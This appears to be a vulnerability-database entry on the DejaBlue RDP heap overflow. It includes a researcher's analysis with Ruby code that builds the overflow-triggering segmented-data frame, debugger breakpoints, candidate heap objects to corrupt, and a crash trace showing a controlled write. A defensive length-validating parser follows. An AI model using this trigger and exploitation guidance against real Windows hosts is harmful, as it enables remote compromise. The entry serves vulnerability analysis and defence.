9.8 High (CVSS3)

Metric | Value
---|---
Attack Vector | NETWORK
Attack Complexity | LOW
Privileges Required | NONE
User Interaction | NONE
Scope | UNCHANGED
Confidentiality Impact | HIGH
Integrity Impact | HIGH
Availability Impact | HIGH

Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

10 High (CVSS2)

Metric | Value
---|---
Access Vector | NETWORK
Access Complexity | LOW
Authentication | NONE
Confidentiality Impact | COMPLETE
Integrity Impact | COMPLETE
Availability Impact | COMPLETE

Vector: AV:N/AC:L/Au:N/C:C/I:C/A:C
A remote code execution vulnerability exists in Remote Desktop Services – formerly known as Terminal Services – when an unauthenticated attacker connects to the target system using RDP and sends specially crafted requests. This vulnerability is pre-authentication and requires no user interaction. An attacker who successfully exploited this vulnerability could execute arbitrary code on the target system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.
To exploit this vulnerability, an attacker would need to send a specially crafted request to the target system's Remote Desktop Service via RDP.
The update addresses the vulnerability by correcting how Remote Desktop Services handles connection requests.
Recent assessments:
zeroSteiner at November 14, 2019 5:12pm UTC reported:
Analysis performed using rdpcorets.dll from Windows 8.1 x64 (sha256: c9d1f3c0a9459c67e96115041d622808decc31f9a9b7e3b4806421557f09cda1).

The vulnerability exists within rdpcorets.dll loaded in the process svchost.exe -k NetworkService running as NT AUTHORITY\NETWORK SERVICE. This is started by the service “Remote Desktop Services”.

The bug is triggered by sending a specially crafted request over the drdynvc channel, which must be set up. Use the flags RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP when initializing it.

After the DynVC channel has been initialized, the overflow is triggered by sending a segmented data (DYNVC_DATA_COMPRESSED) frame; see MS-RDPEDYC:25 for details. Note that segmented data is different from a data segment.
The compressed frame includes a payload as defined in MS-RDPEGFX section 2.2.5. The below snippet can be used to build a compatible data segment. The RDP segmented data field contains a length field which is the root cause of the vulnerability.
```ruby
# see [MS-RDPEGFX] section 2.2.5.2
def build_rdp_data_segment(data)
  # RDP_DATA_SEGMENT: size (UINT32, counts the bulk header byte) followed by
  # RDP8_BULK_ENCODED_DATA (header byte 0x04, then the data)
  encoded = [data.length + 1].pack("L<")
  encoded << "\x04"
  encoded << data
end

def build_trigger
  # see [MS-RDPEGFX] section 2.2.5
  rdp_data_segment = build_rdp_data_segment(("\x41" * 0x50) + [0xdead1337dead1337].pack('Q'))
  # RDP_SEGMENTED_DATA: descriptor 0xE1 (multipart), segmentCount, uncompressedSize
  rdp_segmented_data = [0xe1, 1, 0x40 - 0x2000].pack("CS<l<") + rdp_data_segment
end
```
An object needs to be created and corrupted; potential candidates are below.

Object Name | Breakpoint Address | Size | Can Create?
---|---|---|---
CRdpDynVCMgr ChannelInternal | rdpcorets+c8e03 | 0x138 | Static number can be created
DecompressRdp8 | rdpcorets+16274a | 0x68 |
DecompressUnchopper | rdpcorets+12dd1a | 0x48 |

- rdpcorets+f67dc ".printf \"CRdpDynVCMgr::HandleIncomingDvcData\\n\"; db rdx"
- rdpcorets+1dcc89 ".printf \"memcpy(dst=%N, src=%N, size=%N)\\n\", rcx, rdx, r8; g" (the memcpy call that copies the buffer to the target and overflows it)
- rdpcorets+c9538 ".printf \"CRdpDynVC::Initialize\\n\"; g"
- msvcrt+1e00 ".printf \"operator new(size=%N)\", rcx; gu; .printf \" = %N\\n\", rax; g"
The following stack trace was taken during a RAV after having corrupted an object using the target memcpy call.
```
0:001> g
(138c.13b4): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
rdpcorets+0xd9d36:
00007fff`a5b79d36 49895014 mov qword ptr [r8+14h],rdx ds:41414141`41414155=????????????????
0:033> k
Child-SP          RetAddr           Call Site
00000050`beaaf478 00007fff`a5b79c7f rdpcorets+0xd9d36
00000050`beaaf480 00007fff`a5b7c3bf rdpcorets+0xd9c7f
00000050`beaaf4c0 00007fff`a5b91190 rdpcorets+0xdc3bf
00000050`beaaf5f0 00007fff`a5b90cb1 rdpcorets+0xf1190
00000050`beaaf690 00007fff`a5bf2893 rdpcorets+0xf0cb1
00000050`beaaf720 00007fff`c9ed13d2 rdpcorets!DllGetClassObject+0x75b3
00000050`beaaf7e0 00007fff`caf654f4 KERNEL32!BaseThreadInitThunk+0x22
00000050`beaaf810 00000000`00000000 ntdll!RtlUserThreadStart+0x34
0:033> u
rdpcorets+0xd9d36:
00007fff`a5b79d36 49895014         mov qword ptr [r8+14h],rdx
00007fff`a5b79d3a 498d5028         lea rdx,[r8+28h]
00007fff`a5b79d3e 41c7401038000000 mov dword ptr [r8+10h],38h
00007fff`a5b79d46 4d89481c         mov qword ptr [r8+1Ch],r9
00007fff`a5b79d4a 45894824         mov dword ptr [r8+24h],r9d
00007fff`a5b79d4e 8d0c8510000000   lea ecx,[rax*4+10h]
00007fff`a5b79d55 4803ca           add rcx,rdx
00007fff`a5b79d58 44890a           mov dword ptr [rdx],r9d
0:033> r
rax=0000000000000000 rbx=00007fffa5b79d10 rcx=00000050bf0c1940
rdx=0000000000000001 rsi=00000050bdcba9a0 rdi=00000050bf0c1940
rip=00007fffa5b79d36 rsp=00000050beaaf478 rbp=00000050bf0c7450
 r8=4141414141414141  r9=0000000000000000 r10=0000000000000007
r11=00000050beaaf4b8 r12=00000050bf0c1f40 r13=00000050bf0c23c0
r14=0000000000000000 r15=00000050bdccfdc0
iopl=0         nv up ei pl zr na po nc
cs=0033  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010246
rdpcorets+0xd9d36:
00007fff`a5b79d36 49895014 mov qword ptr [r8+14h],rdx ds:41414141`41414155=????????????????
```
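The assessment above identifies the length field of the RDP segmented data as the root cause. As an added example (not part of the assessment or of any Metasploit code), the following Ruby parser reads the RDP_SEGMENTED_DATA / RDP_DATA_SEGMENT layout from [MS-RDPEGFX] 2.2.5 and 2.2.5.2 and refuses a frame whose `uncompressedSize` disagrees with the bytes actually present, which is the check a receiver needs. Constant and function names are mine; only the uncompressed RDP8 bulk header (0x04, the one the trigger uses) is handled.

```ruby
# Added example, not part of the assessment above: a strict parser for the
# RDP_SEGMENTED_DATA layout the trigger targets ([MS-RDPEGFX] 2.2.5 and 2.2.5.2),
# refusing the length fields a receiver must not trust. Names here are mine.

SINGLE    = 0xE0  # descriptor: a single RDP8_BULK_ENCODED_DATA follows
MULTIPART = 0xE1  # descriptor: segmentCount, uncompressedSize, then segments
RDP8_BULK_UNCOMPRESSED = 0x04  # the bulk header byte used by the trigger

class SegmentedDataError < StandardError; end

# RDP8_BULK_ENCODED_DATA: one header byte followed by data. Only the plain
# (uncompressed) RDP8 header is accepted; the compressed form needs a decoder.
def parse_bulk(buf, offset, size)
  raise SegmentedDataError, "bulk data needs at least its header byte" if size < 1
  header = buf.getbyte(offset)
  unless header == RDP8_BULK_UNCOMPRESSED
    raise SegmentedDataError, format("unsupported bulk header 0x%02x", header)
  end
  buf.byteslice(offset + 1, size - 1)
end

# Returns { descriptor:, uncompressed_size:, segments: [String, ...] } with each
# segment's header stripped, or raises SegmentedDataError if any length field
# is truncated, overlong, or disagrees with the bytes actually present.
def parse_rdp_segmented_data(buf)
  buf = buf.dup.force_encoding(Encoding::BINARY)
  raise SegmentedDataError, "empty input" if buf.empty?

  descriptor = buf.getbyte(0)
  case descriptor
  when SINGLE
    data = parse_bulk(buf, 1, buf.bytesize - 1)
    { descriptor: descriptor, uncompressed_size: data.bytesize, segments: [data] }
  when MULTIPART
    raise SegmentedDataError, "truncated multipart header" if buf.bytesize < 7
    segment_count, uncompressed_size = buf.byteslice(1, 6).unpack("S<L<")
    raise SegmentedDataError, "segmentCount must be > 0" if segment_count.zero?

    offset = 7
    segments = []
    segment_count.times do |i|
      raise SegmentedDataError, "segment #{i}: truncated size field" if buf.bytesize - offset < 4
      size = buf.byteslice(offset, 4).unpack1("L<")
      offset += 4
      if size > buf.bytesize - offset
        raise SegmentedDataError, "segment #{i}: size #{size} runs past end of input"
      end
      segments << parse_bulk(buf, offset, size)
      offset += size
    end
    if offset != buf.bytesize
      raise SegmentedDataError, "#{buf.bytesize - offset} trailing bytes after last segment"
    end
    # The field the vulnerable handler trusted: it must equal the real payload size.
    total = segments.sum(&:bytesize)
    if total != uncompressed_size
      raise SegmentedDataError,
            format("uncompressedSize 0x%x does not match %d bytes of segment data", uncompressed_size, total)
    end
    { descriptor: descriptor, uncompressed_size: uncompressed_size, segments: segments }
  else
    raise SegmentedDataError, format("unknown descriptor 0x%02x", descriptor)
  end
end

# Constructed sample: a consistent two-segment frame (0x10 + 0x08 data bytes).
def good_frame
  seg_a = "A" * 0x10
  seg_b = "B" * 0x08
  frame = [MULTIPART, 2, seg_a.bytesize + seg_b.bytesize].pack("CS<L<")
  frame << [seg_a.bytesize + 1].pack("L<") << "\x04" << seg_a
  frame << [seg_b.bytesize + 1].pack("L<") << "\x04" << seg_b
end

# Constructed sample in the shape of build_trigger above: uncompressedSize is
# 0x40 - 0x2000 (0xFFFFE040 as a UINT32) over a single 0x58-byte segment.
def inconsistent_frame
  data = ("\x41" * 0x50) + [0xdead1337dead1337].pack("Q<")
  [MULTIPART, 1, 0x40 - 0x2000].pack("CS<l<") + [data.bytesize + 1].pack("L<") + "\x04" + data
end

# What a validating receiver would log for a frame, or nil when it is accepted.
def validation_error(buf)
  parse_rdp_segmented_data(buf)
  nil
rescue SegmentedDataError => e
  e.message
end
```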
busterb at August 13, 2019 5:48pm UTC reported:
bwatters-r7 at August 22, 2019 10:14pm UTC reported:
sgonzalez-r7 at August 26, 2019 4:32pm UTC reported:
space-r7 at August 19, 2019 7:17pm UTC reported:
wvu-r7 at August 22, 2019 10:37pm UTC reported:
ccondon-r7 at September 13, 2019 8:20pm UTC reported:
Assessed Attacker Value: 5
Assessed Attacker Value: 5
Assessed Attacker Value: 3
cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1182
cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1182
portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1181
twitter.com/malwaretechblog/status/1161329312986873857?s=12
www.malwaretech.com/2019/08/dejablue-analyzing-a-rdp-heap-overflow.html